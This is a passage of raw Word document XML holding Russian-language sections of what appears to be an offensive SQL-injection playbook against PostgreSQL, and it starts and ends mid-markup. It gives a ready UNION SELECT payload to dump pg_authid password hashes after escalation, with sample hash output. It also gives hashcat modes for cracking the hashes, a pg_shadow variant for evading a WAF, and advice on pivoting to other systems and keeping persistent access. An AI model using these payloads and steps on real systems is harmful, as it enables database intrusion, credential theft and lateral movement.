          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — могут читать всё через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_basebackup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/логическую репликацию, минуя обычные права таблиц.</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Роли с `createrole = true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — могут создавать новые роли и наследовать их (один из векторов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`rolvaliduntil` в прошлом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — роль с истёкшим паролем, но не удалённая — индикатор orphaned-аккаунта (часто бывший сотрудник), которым легче «угнать» (если есть способ сбросить пароль).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что это view, спроектированный для self-introspection: приложения и ORM запрашивают «какие роли у меня есть» без необходимости в superuser. Колонка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в view-определении заменена на литерал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даже SUPERUSER через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хешей не увидит, ему нужно идти в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напрямую (Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — `pg_authid.rolpassword` (после получения SUPERUSER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта карточка применима </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> успешной эскалации (3.13). До неё запрос вернёт ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это сам по себе сигнал, что текущая роль не superuser (и что лимит инъекции — application-роль).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `role_filter`):</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rolname || ' :: ' || COALESCE(rolpassword, '&lt;no-password&gt;'), rolvaliduntil FROM pg_authid WHERE rolcanlogin = true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username, last_login FROM admin_users WHERE role = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolname || ' :: ' || COALESCE(rolpassword, '&lt;no-password&gt;'),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolvaliduntil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_authid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE rolcanlogin = true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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все login-роли кластера с хешами:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres :: SCRAM-SHA-256$4096:rR/+gWl9F6OQUcK+xqL3kQ==$YV...QQ=:Tz...wM=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">appwriter :: SCRAM-SHA-256$4096:8mZ/jHsT...==$ab...==:cd...==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backup_op :: md5d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">legacy_user :: &lt;no-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что атакующий из этого извлекает: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SCRAM-SHA-256-хеши</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRAM-SHA-256$&lt;iter&gt;:&lt;salt&gt;$&lt;StoredKey&gt;:&lt;ServerKey&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, дефолт с PG 14) — оффлайн-подбор через hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 28600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или john с патчем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgsql-scram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Кост — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iter&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (4096 — дефолт PG 14+, можно поднять через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">password_encryption_iterations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md5-хеши</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5&lt;hex32&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5(password || rolname)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — оффлайн-подбор через hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PG до 13 использовал md5 по умолчанию; апгрейд кластера сам по себе не пересчитывает хеши — старые md5 остаются в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до явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER USER ... PASSWORD ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. На реальных кластерах часто соседствуют SCRAM и md5.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NULL `rolpassword`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (роли без пароля) — через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могут иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trust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peer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ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> auth и пускать без пароля. Цель —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(3.6.3 file-read).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`rolvaliduntil` в прошлом + ненулевой хеш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пароль формально истёк, но в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запись для роли может это игнорировать; стоит проверить отдельной попыткой login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COALESCE(rolpassword, '&lt;no-password&gt;')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужен потому, что роль без пароля имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rolpassword = NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а NULL в конкатенации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поглощает всю строку — без COALESCE такая запись просто исчезнет из вывода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 — view с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rolcanlogin = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> поверх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payload через неё короче (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT usename || ':' || passwd FROM pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), результат идентичен. Использовать </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 имеет смысл, если WAF блокирует подстроку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но пропускает </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Полный дамп аутентификационной модели кластера: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До superuser:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> карта ролей и их привилегий (Payload A). Это позволяет точно нацелить 3.13 (понять, какую роль угонять), оценить scope (есть ли </w:t>
      </w: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 для 3.17), увидеть orphaned-аккаунты.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После superuser:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> все хеши паролей login-ролей (Payload B). Если хеши </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практически мгновенный оффлайн-подбор для слабых паролей (десятки тысяч hash/sec на одной GPU). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRAM-SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при дефолтных 4096 итерациях даёт ~50-200 hash/sec на GPU — заметно медленнее, но всё ещё реально для словарных атак на 4096-итерационный кост.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Cross-system pivot:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> хеши часто переиспользуются (DBA использует один пароль для нескольких кластеров, или application-пароль из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DATABASE_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> совпадает с паролем сервиса в k8s-секрете). Подобранный пароль — это вход в смежные системы, не только в этот PG.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Persistence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после подбора пароля superuser-а вход без эксплуатации SQLi (через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pgAdmin, любой backup tool) — стабильная точка возврата, не зависящая от того, патчится ли исходная инъекция в приложении.</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единственная таблица в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cluster-wide tablespace), а не per-database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Содержимое одинаково во всех БД одного кластера. SELECT на неё дефолтно — только SUPERUSER; с PG 14 предопределённая роль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тоже даёт доступ (это сделано для backup-инструментов).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VIEW pg_shadow AS SELECT ... FROM pg_authid WHERE rolcanlogin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
